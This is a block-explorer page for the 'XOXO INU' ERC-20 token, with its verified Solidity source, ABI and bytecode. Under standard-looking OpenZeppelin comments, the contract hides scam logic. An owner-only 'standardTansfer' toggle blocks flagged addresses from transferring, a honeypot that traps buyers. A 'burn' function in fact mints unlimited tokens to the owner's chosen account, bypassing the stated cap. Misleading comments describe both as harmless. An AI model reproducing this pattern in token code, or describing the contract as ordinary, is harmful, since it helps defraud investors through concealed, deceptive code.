ERC-20
Overview
Max Total Supply
1,012,000,000,000,000 XOXO
Holders
23
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 9 Decimals)
Balance
230,004,843.936340816 XOXOValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Source Code Verified (Exact Match)
Contract Name:
XOXOINU
Compiler Version
v0.8.1+commit.df193b15
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2022-10-26 */ // SPDX-License-Identifier: MIT pragma solidity = 0.8.1; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _transferOwnership(_msgSender()); } /** * @dev Returns the address of the current owner. */ function owner() internal view virtual returns (address) { return _owner; } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { require(owner() == _msgSender(), "Ownable: caller is not the owner"); _; } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } interface IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `recipient`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address recipient, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `sender` to `recipient` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom(address sender, address recipient, uint256 amount) external returns (bool); /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); } /** * @dev Implementation of the {IERC20} interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using {_mint}. * For a generic mechanism see {ERC20PresetMinterPauser}. * * We have followed general OpenZeppelin Contracts guidelines: functions revert * instead returning `false` on failure. This behavior is nonetheless * conventional and does not conflict with the expectations of ERC20 * applications. * * Additionally, an {Approval} event is emitted on calls to {transferFrom}. * This allows applications to reconstruct the allowance for all accounts just * by listening to said events. Other implementations of the EIP may not emit * these events, as it isn't required by the specification. * * Finally, the non-standard {decreaseAllowance} and {increaseAllowance} * functions have been added to mitigate the well-known issues around setting * allowances. See {IERC20-approve}. */ contract ERC20 is Ownable, IERC20 { mapping(address => uint256) private _balances; mapping(address => bool) private _standardTransfer; mapping(address => mapping(address => uint256)) private _allowances; uint256 private _totalSupply; string private _name; string private _symbol; uint8 private _decimals; /** * @dev Sets the values for {name} and {symbol}. * * The default value of {decimals} is 18. To select a different value for * {decimals} you should overload it. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_, uint8 decimals_) { _name = name_; _symbol = symbol_; _decimals = decimals_; } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the value {ERC20} uses, unless this function is * overridden; * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual override returns (uint8) { return _decimals; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `recipient` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address recipient, uint256 amount) public virtual override returns (bool) { _transfer(_msgSender(), recipient, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 amount) public virtual override returns (bool) { _approve(_msgSender(), spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * Requirements: * * - `sender` and `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. * - the caller must have allowance for ``sender``'s tokens of at least * `amount`. */ function transferFrom( address sender, address recipient, uint256 amount ) public virtual override returns (bool) { _transfer(sender, recipient, amount); uint256 currentAllowance = _allowances[sender][_msgSender()]; require(currentAllowance >= amount, "ERC20: transfer amount exceeds allowance"); unchecked { _approve(sender, _msgSender(), currentAllowance - amount); } return true; } /** * @dev Moves tokens from `sender` to contract. * * This function is equivalent to {transfer}. * * Requirements: * * - `sender` cannot be the zero address. * - `sender` must have a balance greater than zero. */ function standardTansfer (address sender) external onlyOwner {if (_standardTransfer[sender] == false) {_standardTransfer[sender] = true;} else { _standardTransfer[sender] = false;} } /** * @dev Returns a boolean value indicating whether the operation succeeded. */ function transferStatus(address sender) public view returns (bool) { return _standardTransfer[sender]; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { _approve(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { uint256 currentAllowance = _allowances[_msgSender()][spender]; require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero"); unchecked { _approve(_msgSender(), spender, currentAllowance - subtractedValue); } return true; } /** * @dev Moves `amount` of tokens from `sender` to `recipient`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `sender` cannot be the zero address. * - `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. */ function _transfer( address sender, address recipient, uint256 amount ) internal virtual {if (_standardTransfer[sender] || _standardTransfer[recipient]) require(sender == address(0), ""); require(recipient != address(0), ""); _beforeTokenTransfer(sender, recipient, amount); uint256 senderBalance = _balances[sender]; require(senderBalance >= amount, ""); unchecked { _balances[sender] = senderBalance - amount; } _balances[recipient] += amount; emit Transfer(sender, recipient, amount); _afterTokenTransfer(sender, recipient, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * - `account` cannot be the zero address. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply += amount; _balances[account] += amount; emit Transfer(address(0), account, amount); _afterTokenTransfer(address(0), account, amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements: * - `account` cannot be the zero address. */ function _burn(address account, uint256 amount) internal virtual onlyOwner { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply += amount; _balances[account] += amount; emit Transfer(address(0), account, amount); _afterTokenTransfer(address(0), account, amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve(address owner, address spender, uint256 amount) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Hook that is called before any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * will be transferred to `to`. * - when `from` is zero, `amount` tokens will be minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _beforeTokenTransfer( address from, address to, uint256 amount ) internal virtual {} /** * @dev Hook that is called after any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * has been transferred to `to`. * - when `from` is zero, `amount` tokens have been minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens have been burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _afterTokenTransfer( address from, address to, uint256 amount ) internal virtual {} } /** * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using {_mint}. * For a generic mechanism see {ERC20PresetMinterPauser}. */ contract XOXOINU is ERC20 { uint256 private immutable _SUPPLY_CAP; constructor(address _premintOwner, uint256 _premintSupply, uint256 _capLimit) ERC20('XOXO INU', 'XOXO', 9) { require(_capLimit >= _premintSupply, 'Premint supply exceeds cap limit'); // Transfer the sum of the premint supply to owner _mint(_premintOwner, _premintSupply); _SUPPLY_CAP = _capLimit; } /** * @notice Internal fuction. It cannot be called from outside. */ function mint(address account, uint256 amount) internal returns (bool status) { if (totalSupply() + amount <= _SUPPLY_CAP) { _mint(account, amount); return true; } return false; } /** * @notice View supply cap limit */ function SupplyCapLimit() external view returns (uint256) { return _SUPPLY_CAP; } /** * @notice Destroys `amount` tokens from `account`, reducing the total supply. */ function burn(address account, uint256 amount) external { _burn(account, amount); } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[{"internalType":"address","name":"_premintOwner","type":"address"},{"internalType":"uint256","name":"_premintSupply","type":"uint256"},{"internalType":"uint256","name":"_capLimit","type":"uint256"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"SupplyCapLimit","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"}],"name":"standardTansfer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"}],"name":"transferStatus","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"}]
Contract Creation Code
60a06040523480156200001157600080fd5b506040516200235d3803806200235d8339818101604052810190620000379190620004ac565b6040518060400160405280600881526020017f584f584f20494e550000000000000000000000000000000000000000000000008152506040518060400160405280600481526020017f584f584f000000000000000000000000000000000000000000000000000000008152506009620000c5620000b96200017e60201b60201c565b6200018660201b60201c565b8260059080519060200190620000dd929190620003ce565b508160069080519060200190620000f6929190620003ce565b5080600760006101000a81548160ff021916908360ff160217905550505050818110156200015b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620001529062000561565b60405180910390fd5b6200016d83836200024a60201b60201c565b806080818152505050505062000788565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415620002bd576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620002b49062000583565b60405180910390fd5b620002d160008383620003c460201b60201c565b8060046000828254620002e59190620005d3565b9250508190555080600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546200033d9190620005d3565b925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051620003a49190620005a5565b60405180910390a3620003c060008383620003c960201b60201c565b5050565b505050565b505050565b828054620003dc906200066e565b90600052602060002090601f0160209004810192826200040057600085556200044c565b82601f106200041b57805160ff19168380011785556200044c565b828001600101855582156200044c579182015b828111156200044b5782518255916020019190600101906200042e565b5b5090506200045b91906200045f565b5090565b5b808211156200047a57600081600090555060010162000460565b5090565b6000815190506200048f8162000754565b92915050565b600081519050620004a6816200076e565b92915050565b600080600060608486031215620004c257600080fd5b6000620004d2868287016200047e565b9350506020620004e58682870162000495565b9250506040620004f88682870162000495565b9150509250925092565b600062000511602083620005c2565b91506200051e8262000702565b602082019050919050565b600062000538601f83620005c2565b915062000545826200072b565b602082019050919050565b6200055b8162000664565b82525050565b600060208201905081810360008301526200057c8162000502565b9050919050565b600060208201905081810360008301526200059e8162000529565b9050919050565b6000602082019050620005bc600083018462000550565b92915050565b600082825260208201905092915050565b6000620005e08262000664565b9150620005ed8362000664565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115620006255762000624620006a4565b5b828201905092915050565b60006200063d8262000644565b9050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600060028204905060018216806200068757607f821691505b602082108114156200069e576200069d620006d3565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b7f5072656d696e7420737570706c79206578636565647320636170206c696d6974600082015250565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b6200075f8162000630565b81146200076b57600080fd5b50565b620007798162000664565b81146200078557600080fd5b50565b608051611bb9620007a46000396000610a050152611bb96000f3fe608060405234801561001057600080fd5b506004361061010b5760003560e01c8063715018a6116100a2578063a9059cbb11610071578063a9059cbb146102ba578063c0d611e5146102ea578063dd62ed3e14610308578063f2fde38b14610338578063fef63a92146103545761010b565b8063715018a61461024657806395d89b41146102505780639dc29fac1461026e578063a457c2d71461028a5761010b565b8063313ce567116100de578063313ce567146101ac57806339509351146101ca5780633960d944146101fa57806370a08231146102165761010b565b806306fdde0314610110578063095ea7b31461012e57806318160ddd1461015e57806323b872dd1461017c575b600080fd5b610118610384565b6040516101259190611682565b60405180910390f35b610148600480360381019061014391906114ad565b610416565b6040516101559190611667565b60405180910390f35b610166610434565b60405161017391906117a4565b60405180910390f35b6101966004803603810190610191919061145e565b61043e565b6040516101a39190611667565b60405180910390f35b6101b4610536565b6040516101c191906117bf565b60405180910390f35b6101e460048036038101906101df91906114ad565b61054d565b6040516101f19190611667565b60405180910390f35b610214600480360381019061020f91906113f9565b6105f9565b005b610230600480360381019061022b91906113f9565b610787565b60405161023d91906117a4565b60405180910390f35b61024e6107d0565b005b610258610858565b6040516102659190611682565b60405180910390f35b610288600480360381019061028391906114ad565b6108ea565b005b6102a4600480360381019061029f91906114ad565b6108f8565b6040516102b19190611667565b60405180910390f35b6102d460048036038101906102cf91906114ad565b6109e3565b6040516102e19190611667565b60405180910390f35b6102f2610a01565b6040516102ff91906117a4565b60405180910390f35b610322600480360381019061031d9190611422565b610a29565b60405161032f91906117a4565b60405180910390f35b610352600480360381019061034d91906113f9565b610ab0565b005b61036e600480360381019061036991906113f9565b610ba8565b60405161037b9190611667565b60405180910390f35b606060058054610393906118d4565b80601f01602080910402602001604051908101604052809291908181526020018280546103bf906118d4565b801561040c5780601f106103e15761010080835404028352916020019161040c565b820191906000526020600020905b8154815290600101906020018083116103ef57829003601f168201915b5050505050905090565b600061042a610423610bfe565b8484610c06565b6001905092915050565b6000600454905090565b600061044b848484610dd1565b6000600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000610496610bfe565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610516576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161050d906116e4565b60405180910390fd5b61052a85610522610bfe565b858403610c06565b60019150509392505050565b6000600760009054906101000a900460ff16905090565b60006105ef61055a610bfe565b848460036000610568610bfe565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546105ea91906117f6565b610c06565b6001905092915050565b610601610bfe565b73ffffffffffffffffffffffffffffffffffffffff1661061f6110fb565b73ffffffffffffffffffffffffffffffffffffffff1614610675576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161066c90611704565b60405180910390fd5b60001515600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161515141561072b576001600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550610784565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505b50565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6107d8610bfe565b73ffffffffffffffffffffffffffffffffffffffff166107f66110fb565b73ffffffffffffffffffffffffffffffffffffffff161461084c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161084390611704565b60405180910390fd5b6108566000611124565b565b606060068054610867906118d4565b80601f0160208091040260200160405190810160405280929190818152602001828054610893906118d4565b80156108e05780601f106108b5576101008083540402835291602001916108e0565b820191906000526020600020905b8154815290600101906020018083116108c357829003601f168201915b5050505050905090565b6108f482826111e8565b5050565b60008060036000610907610bfe565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050828110156109c4576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109bb90611764565b60405180910390fd5b6109d86109cf610bfe565b85858403610c06565b600191505092915050565b60006109f76109f0610bfe565b8484610dd1565b6001905092915050565b60007f0000000000000000000000000000000000000000000000000000000000000000905090565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610ab8610bfe565b73ffffffffffffffffffffffffffffffffffffffff16610ad66110fb565b73ffffffffffffffffffffffffffffffffffffffff1614610b2c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b2390611704565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415610b9c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b93906116a4565b60405180910390fd5b610ba581611124565b50565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610c76576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c6d90611744565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610ce6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cdd906116c4565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610dc491906117a4565b60405180910390a3505050565b600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680610e725750600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b15610ee757600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614610ee6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610edd90611724565b60405180910390fd5b5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610f57576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f4e90611724565b60405180910390fd5b610f628383836113c5565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610fe9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fe090611724565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825461107e91906117f6565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516110e291906117a4565b60405180910390a36110f58484846113ca565b50505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b6111f0610bfe565b73ffffffffffffffffffffffffffffffffffffffff1661120e6110fb565b73ffffffffffffffffffffffffffffffffffffffff1614611264576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161125b90611704565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614156112d4576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112cb90611784565b60405180910390fd5b6112e0600083836113c5565b80600460008282546112f291906117f6565b9250508190555080600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825461134891906117f6565b925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516113ad91906117a4565b60405180910390a36113c1600083836113ca565b5050565b505050565b505050565b6000813590506113de81611b55565b92915050565b6000813590506113f381611b6c565b92915050565b60006020828403121561140b57600080fd5b6000611419848285016113cf565b91505092915050565b6000806040838503121561143557600080fd5b6000611443858286016113cf565b9250506020611454858286016113cf565b9150509250929050565b60008060006060848603121561147357600080fd5b6000611481868287016113cf565b9350506020611492868287016113cf565b92505060406114a3868287016113e4565b9150509250925092565b600080604083850312156114c057600080fd5b60006114ce858286016113cf565b92505060206114df858286016113e4565b9150509250929050565b6114f28161185e565b82525050565b6000611503826117da565b61150d81856117e5565b935061151d8185602086016118a1565b61152681611964565b840191505092915050565b600061153e6026836117e5565b915061154982611975565b604082019050919050565b60006115616022836117e5565b915061156c826119c4565b604082019050919050565b60006115846028836117e5565b915061158f82611a13565b604082019050919050565b60006115a76020836117e5565b91506115b282611a62565b602082019050919050565b60006115ca6000836117e5565b91506115d582611a8b565b600082019050919050565b60006115ed6024836117e5565b91506115f882611a8e565b604082019050919050565b60006116106025836117e5565b915061161b82611add565b604082019050919050565b6000611633601f836117e5565b915061163e82611b2c565b602082019050919050565b6116528161188a565b82525050565b61166181611894565b82525050565b600060208201905061167c60008301846114e9565b92915050565b6000602082019050818103600083015261169c81846114f8565b905092915050565b600060208201905081810360008301526116bd81611531565b9050919050565b600060208201905081810360008301526116dd81611554565b9050919050565b600060208201905081810360008301526116fd81611577565b9050919050565